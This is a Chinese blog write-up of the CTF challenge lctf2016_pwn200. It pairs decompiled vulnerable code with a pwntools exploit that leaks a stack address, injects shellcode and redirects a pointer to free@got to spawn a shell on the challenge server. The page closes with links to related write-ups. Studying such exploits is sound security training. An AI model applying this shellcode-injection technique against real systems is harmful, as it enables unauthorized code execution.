lctf2016_pwn200

最新推荐文章于 2025-05-10 09:55:35 发布
最新推荐文章于 2025-05-10 09:55:35 发布
阅读量101 收藏
点赞数
分类专栏: Buuoj刷题 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_62887641/article/details/132530305
版权

lctf2016_pwn200

    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x3ff000)
    RWX:      Has RWX segments

64位,保护全关

第一个想法就是写shellcode

只贴重要的

__int64 sub_400A8E()
{
  __int64 i; // [rsp+10h] [rbp-40h]
  char v2[48]; // [rsp+20h] [rbp-30h] BYREF

  puts("who are u?");
  for ( i = 0LL; i <= 47; ++i )					#这里存在off by one 漏洞
  {												#输入48个字节就会把该函数的rbp输出出来
    read(0, &v2[i], 1uLL);
    if ( v2[i] == 10 )
    {
      v2[i] = 0;
      break;
    }
  }
  printf("%s, welcome to ISCC~ \n", v2);
  puts("give me your id ~~?");
  READ();
  return sub_400A29();
}

__int64 sub_400A29()
{
  char buf[56]; // [rsp+0h] [rbp-40h] BYREF
  char *dest; // [rsp+38h] [rbp-8h]

  dest = (char *)malloc(0x40uLL);
  puts("give me money~");
  read(0, buf, 0x40uLL);
  strcpy(dest, buf);
  ptr = dest;
  return sub_4009C4();
}

buf长度有0x38,我们可以输入0x40,并且dest是在0x8的位置,我们可以将其覆盖使其ptr指针可控

思路如下

ptr指针改成free@got,此时指向buf的栈空间,我们后面堆执行free(ptr) ----> 执行我们的shellcode

from pwn import*
from Yapack import *
libc=ELF('./libc-2.23.so')
context(os='linux', arch='amd64',log_level='debug')
r,elf=rec("node4.buuoj.cn",28864,"./pwn",10)

sh=asm(shellcraft.sh())
pl=asm(shellcraft.sh()).ljust(48, b'\x00')		#泄露rbp
sa(b'who are u?',pl)
leak=get_addr_u64()
li(leak)
shelladr=p64(leak-0x50)							#下图解析
#li(shelladr)
sla(b'id ~~?',b'0')
pl=shelladr + b'\x00'*(0x38-len(shelladr))+p64(elf.got['free'])		#写入shellcode并且覆盖dest
sa(b'give me money~',pl)

sla(b'your choice : ',b'2')

#debug()
ia()

上面的0x50是
在这里插入图片描述
算出该偏移,即可得到我们shellcode的栈地址
在这里插入图片描述

Lctf-2016-pwn100 题解
lifanxin的博客
12-24 983
Write Up知识点和关键字样本运行静态分析程序逻辑求解脚本 知识点和关键字 栈溢出 ROP 无libc泄露函数地址 样本 来自Lctf 2016年的pwn题,样本 pwn100 (这个资源没办法上传,想要样本的可以留言!) 运行 查看文件属性   64位程序,只开了NX保护 运行样本程序 输入超过200个字符串才会回显"bye~",接着报了一个段错误,程序结束 静态分析 把程序拖进到IDA查看,发现main函数比较简单,主要起作用的是sub_40068E()函数,我们直接进入到这个函数。 该函数又
LCTF2018 PWN easy_heap 远程环境搭建
哒君的博客
08-08 912
一直很头疼环境的问题,需要目标环境的glibc版本是2.27,而我的是2.23 如果开启第二个虚拟机占用内存太大,所以我选择用docker 于是终于找到了能在libc2.27下工作的gdb插件pwngdb(注意不是那个pwndbg) 所以这个镜像可以作为Tcache机制题目的本地测试容器 GitHub docker镜像:链接:https://pan.baidu.com/s/1eCIbJl3Ig9...
buu lctf2016_pwn200
qq_51474381的博客
04-25 340
代码分析 1.可泄露rbp(就是泄露栈地址,因为没有\x00截断时会连带输出后面的数据)。 2.buf可覆盖ptr(栈上变量覆盖),strcpy()可能会破坏我们构造好的payload,但是strcpy()并不会复制"\x00",所以在shellcode最前面要加上"\x00",这样就只有溢出,没有复制 3.后面就是堆的操作了,只有add和delete 总体思路 1.泄露rbp,获得栈地址。 2.写入shellcode+伪造size+覆盖dest,从而控制ptr。 3.free掉.
BUUCTF--lctf2016_pwn200
qq_73149934的博客
04-01 349
free(ptr)后再malloc(0x30),得到这块fake_chunk的控制权,接着将返回地址(get_money_ret)覆盖为shellcode_addr,退出拿到shell。向$buf输入,构造fake_chunk且覆盖dest(ptr)的size,同时修改ptr指向fake_chunk的mem部分。这里得到的是rbp中的值,不是rbp的地址,通过调试得到偏移。3.利用”give me money~“,布置。5.修改返回地址为shellcode的地址。是一个入住宾馆的题目。
[BUUCTF-pwn]——lctf2016_pwn200
Y_peak的博客
03-11 738
[BUUCTF-pwn]——lctf2016_pwn200 题目地址:https://buuoj.cn/challenges#lctf2016_pwn200 还是先chekcsec 一下, 没有开启NX代表我们可以手写shellcode并且执行 在IDA, 中大家自己看看就好,我这里将两个漏洞的位置告诉大家就好 寻找偏移 思路 利用漏洞1, 获得main_ebp地址, 寻找到我们写入的shellcode距离的位置 利用漏洞2 覆盖dest变量值为free的got表的地址, 这样通过strcpy
lctf2016_pwn200 堆利用
人饭子的博客
12-31 589
lctf2016:pwn200 堆利用 一、信息收集 RELRO:在Linux系统安全领域数据可以写的存储区就会是攻击的目标,尤其是存储函数指针的区域。 所以在安全防护的角度来说尽量减少可写的存储区域对安全会有极大的好处.GCC, GNU linker以及Glibc-dynamic linker一起配合实现了一种叫做relro的技术: read only relocation。大概实现就是由l...
CTF竞赛权威指南(Pwn篇) 相关资源.zip
01-14
Java是一种高性能、跨平台的面向对象编程语言。它由Sun Microsystems(现在是Oracle Corporation)的James Gosling等人在1995年推出,被设计为一种简单、健壮、可移植、多线程、动态的语言。Java的主要特点和优势...
【CTF资料-0x0002】PWN简易Linux堆利用入门教程by arttnba3
arttnba3的博客
02-25 6098
【CTF资料-0x0002】简易Linux堆利用入门教程by arttnba3老生常谈,[GITHUB BLOG ADDR](https://archive.next.arttnba3.cn/2021/02/24/%E3%80%90CTF%E8%B5%84%E6%96%99-0x0002%E3%80%91%E7%AE%80%E6%98%93Linux%E5%A0%86%E5%88%A9%E7%94%A8%E5%85%A5%E9%97%A8%E6%95%99%E7%A8%8Bby%20arttnba3/),请
Linux pwn入门教程(3)——ROP技术
xiaoi123的博客
07-10 7714
作者:Tangerine@SAINTSEC原文来自:https://bbs.ichunqiu.com/thread-42530-1-1.html0×00 背景在上一篇教程的《shellcode的变形》一节中,我们提到过内存页的RWX三种属性。显然,如果某一页内存没有可写(W)属性,我们就无法向里面写入代码,如果没有可执行(X)属性,写入到内存页中的shellcode就无法执行。关于这个特性的实验在...
l-ctf2016pwn200 hose-of-spirite
九层台
03-09 505
这里看可以输入48个字节,最后没有跟00能够泄露出来rbp 从ida上面看是这样的,id并没有保存。 但是实际上 id被保存到了这里。 var_38被定义为 刚好再输入的name上面。在栈上显示如下图 #coding=utf-8 from pwn import * context(arch='amd64',os='linux') context.log_level = 'debug' p =...
L-CTF2016 PWN200 writeup
哒君的博客
08-02 716
本以为已经可以做出题来了。。。没想到连利用点在哪都没看见 例行公事 居然什么保护都没开,有趣 利用点分析 v2位于rbp-0x30的位置,而name会读入0x30个字符,且如果读入0x30个字符的话末尾不会有\x00,这样在printf的时候就会顺带leak出rbp的值 id保存在rbp-0x38的位置 *buf在栈上的位置是rbp-0x40,dest在栈上的位置是rbp-0x8,但是b...
LCTF 2016pwn200 解法1
weixin_39678876的博客
10-19 131
还可通过house-of-spirit,在stack上构造fake chunk的方法,但思路大同小异。都是执行shellcode来获取shell。经计算,shellcode长度正好小于0x30,可通过修改返回地址为stack上,执行shellcode代码,获取shell。存在数组越界漏洞,结合strcpy可造成一个地址的任意地址写。存在off-by-on漏洞,可泄露stack地址。查看反汇编,发现可利用漏洞代码。
[pwn][堆利用]house of spirit[例题:lctf2016_pwn200]
zhulintintao的博客
11-21 939
House of spirit 实现目的 malloc分配到目标地址 实现条件 free的参数可控 目标地址可以连续构造两个fake chunk的size域,需要地址对齐(即目标高低地址处均有可控区域) 实现方法 在目标地址伪造可以被释放到fastbin上的fake chunk 伪造fake chunk的同时伪造好其下一个chunk(物理上的)的size域 将目标地址作为参数free malloc一次,将返回指向目标地址的指针 实现实例 题目平台 buuctf 题目名
LCTF 2016 PWN200(House Of Spirit)
Bill
03-24 1784
L-CTF 2016 pwn200 漏洞简介 The house of Spirit The House of Spirit is a little different from other attacks in the sense that it involves an attacker overwriting an existing pointer before it is ‘fr...
引言:Client Hello 为何是 HTTPS 安全的核心?
最新发布
2501_90994755的博客
05-10 291
Cipher Suites TLS_AES_256_GCM_SHA384 TLS 1.3 仅保留 5 个强密码套件,而 TLS 1.2 支持数十种(需谨慎过滤弱算法)openssl s_client -connect example.com:443 -tls1_3 # 手动测试 TLS 1.3。使用 TLS_RSA_WITH_3DES_EDE_CBC_SHA(3DES 算法已过时,易受 SWEET32 攻击)。欢迎在评论区分享经历!
7.2.安全防御
2301_79902294的博客
05-07 849
• 密码存储:BCrypt与Argon2算法实现(Spring Security) • 多因素认证(MFA):TOTP集成(Google Authenticator API) • 生物识别安全:活体检测与本地存储(Android Biometric API)• 数据库加密:透明数据加密(TDE)、字段级加密(Jasypt) • 文件存储安全:权限控制(Linux ACL)、客户端加密(WebCrypto API) • 备份与恢复策略:异地加密备份(AWS S3 + KMS)-- 身份证号 -->
中级注册安全工程师的《安全生产专业实务》科目如何选择专业?
m0_60557936的博客
05-07 486
中级注册安全工程师的《安全生产专业实务》有 7 个专业方向,选择时可考虑以下几个方面:
渗透测试行业术语2
2301_76419201的博客
05-09 920
内生安全有三个特性,即依靠信息化系统与安全系统的聚合、业务数据与安全数 据的聚合以及 IT 人才和安全人才的聚合,从信息化系统的内部,不断长出自适 应、自主和自成长的安全能力。根据 Gartner 的定义,威胁情报是某种基于证据的知识,包括上下文、机制、标 示、含义和能够执行的建议,这些知识与资产所面临已有的或酝酿中的威胁或危 害相关,可用于资产相关主体对威胁或危害的响应或处理决策提供信息支持。这样一来,这些浏览器所在的服务器跟用户所在环境中的终端和网络是隔离的, 从而使得客户所在网络的暴露面大大降低。
LCTF VariSpec液体晶体调谐滤波器软件更新回顾
### LCTF软件备份VariSpec™ Liquid Crystal Tunable Filters版本更新概览 #### 1.3.7.1版本 - **发布日期**: 2006年12月11日 - **已知错误**: 无 **新增功能与修正**: a) 在VsDrvr.dll中增加了对每个进程支持多个...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值